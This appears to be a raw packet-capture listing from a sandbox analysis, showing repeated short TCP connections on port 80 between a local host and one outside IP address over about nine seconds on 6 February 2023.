                                                        Feb 6, 2023 14:16:57.920320988 CET804974662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:57.920466900 CET4974680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.031753063 CET4974680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.032716036 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.091959000 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.092201948 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.093214035 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.093393087 CET804974662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.093502045 CET4974680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.156084061 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.160079002 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.160233974 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.273191929 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.274482012 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.333806992 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.334178925 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.335123062 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.335378885 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.336551905 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.400031090 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.402678013 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.402803898 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.515983105 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.516999960 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.576625109 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.576833010 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.579652071 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.579807997 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.580579996 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.643040895 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.645394087 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.645538092 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.750211954 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.751117945 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.812520027 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.812711954 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.813121080 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.813208103 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.814620018 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.875929117 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.879216909 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.879334927 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.988476038 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.989217043 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.050399065 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.050517082 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.050985098 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.051095009 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.053793907 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.114810944 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.119268894 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.119393110 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.237354040 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.246206999 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.298631907 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.298718929 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.308548927 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.308742046 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.309365988 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.370738983 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.375677109 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.375967979 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.484575033 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.485263109 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.546855927 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.547342062 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.547956944 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.548197031 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.551732063 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.616081953 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.619138002 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.619298935 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.737266064 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.737929106 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.800012112 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.800061941 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.800117016 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.800247908 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.800601959 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.862850904 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.865664959 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.865818024 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.968765974 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.969590902 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.032002926 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.032057047 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.032186031 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.032249928 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.032530069 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.096043110 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.104228020 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.105350018 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.219949007 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.228585005 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.282857895 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.286046982 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.292314053 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.296093941 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.296701908 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.358794928 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.362060070 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.362180948 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.475377083 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.476102114 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.537169933 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.537214041 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.537416935 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.537791014 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.537791014 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.597498894 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.601149082 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.604368925 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.720138073 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.721158981 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.782983065 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.784157038 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.786325932 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.786449909 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.787103891 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.849549055 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.852035046 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.852214098 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.970238924 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.971394062 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.032197952 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.032355070 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.034832954 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.035012007 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.035712957 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.098167896 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.102294922 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.104098082 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.227199078 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.228226900 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.288784981 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.289002895 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.289235115 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.289253950 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.327723980 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.388149023 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.400182962 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.400398970 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.516415119 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.517260075 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.577002048 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.577385902 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.579174042 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.579410076 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.580132008 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.644923925 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.646137953 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.646328926 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.751084089 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.752119064 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.813443899 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.813466072 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.813683987 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.814766884 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.814766884 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.883169889 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.886197090 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.886359930 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.000653028 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.001650095 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.062210083 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.062349081 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.062355042 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.062457085 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.065956116 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.088133097 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.088282108 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.138550043 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.138685942 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.138797998 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.250628948 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.251530886 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.317265987 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.317339897 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.318675041 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.318835974 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.319284916 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.381938934 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.385740995 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.385898113 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.501190901 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.501866102 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.563199997 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.563308954 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.563683033 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.564239979 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.564336061 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.625026941 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.628305912 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.628396034 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.735565901 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.736407995 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.797504902 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.797652006 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.799484968 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.799634933 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.800103903 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.862725973 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.870012999 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.870136976 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.989965916 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.990797043 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.052397966 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.052820921 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.053143978 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.053267002 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.053365946 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.114790916 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.120043039 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.120232105 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.235744953 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.237349987 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.298047066 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.298211098 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.300010920 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.300182104 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.301034927 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.363495111 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.366358995 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.366547108 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.469860077 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.470758915 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.537036896 CET804976962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.537338018 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.537492037 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.540216923 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.541604042 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.601032972 CET804976962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.604628086 CET804976962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.604799986 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.720197916 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.722012043 CET4977080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.780957937 CET804976962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.781191111 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.784127951 CET804977062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.784529924 CET4977080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.784821033 CET4977080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.849318981 CET804977062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.849550009 CET804977062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.849786043 CET4977080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.954206944 CET4977080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.955112934 CET4977180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.017503977 CET804977162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.017981052 CET804977062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.018263102 CET4977180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.018275023 CET4977080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.019413948 CET4977180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.079821110 CET804977162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.084112883 CET804977162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.084867001 CET4977180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.190428972 CET4977180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.191063881 CET4977280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.250850916 CET804977162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.251058102 CET4977180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.253483057 CET804977262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.253705978 CET4977280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.254513979 CET4977280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.316883087 CET804977262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.319797039 CET804977262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.319931984 CET4977280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.422621965 CET4977280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.423919916 CET4977380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.487087011 CET804977362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.487186909 CET804977262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.487289906 CET4977380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.487339020 CET4977280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.487845898 CET4977380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.548943996 CET804977362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.551690102 CET804977362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.551934958 CET4977380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.656812906 CET4977380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.657634974 CET4977480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.718321085 CET804977362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.718556881 CET4977380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.719126940 CET804977462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.719420910 CET4977480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.719767094 CET4977480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.781088114 CET804977462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.784183979 CET804977462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.784336090 CET4977480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.891721964 CET4977480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.892754078 CET4977580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.955233097 CET804977462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.955374002 CET4977480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.957253933 CET804977562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:04.957415104 CET4977580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:04.965034008 CET4977580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.030204058 CET804977562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.031927109 CET804977562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.032052040 CET4977580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.145636082 CET4977580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.146539927 CET4977680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.212497950 CET804977562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.212642908 CET4977580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.212711096 CET804977662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.212810040 CET4977680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.213337898 CET4977680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.273991108 CET804977662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.276880980 CET804977662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.277014017 CET4977680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.392368078 CET4977680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.393290997 CET4977780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.455802917 CET804977662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.455836058 CET804977762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.456008911 CET4977680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.456011057 CET4977780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.460295916 CET4977780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.522008896 CET804977762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.525388002 CET804977762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.525757074 CET4977780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.642055988 CET4977780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.643088102 CET4977880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.704395056 CET804977862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.704498053 CET4977880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.705310106 CET804977762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.705506086 CET4977780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.707869053 CET4977880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.769531012 CET804977862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.772675037 CET804977862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.772810936 CET4977880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.876166105 CET4977880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.876909018 CET4977980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.935687065 CET804977862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.935776949 CET4977880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.940877914 CET804977962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:05.941008091 CET4977980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:05.941637993 CET4977980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.004420996 CET804977962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:06.007407904 CET804977962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:06.007627010 CET4977980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.110688925 CET4977980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.112150908 CET4978080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.174523115 CET804978062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:06.174715996 CET4978080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.174736023 CET804977962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:06.174823046 CET4977980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.175417900 CET4978080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.240854979 CET804978062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:06.244282007 CET804978062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:06.244369030 CET4978080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.360852003 CET4978080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.361788988 CET4978180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:06.423257113 CET804978062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:06.424561977 CET4978080192.168.2.562.204.41.4
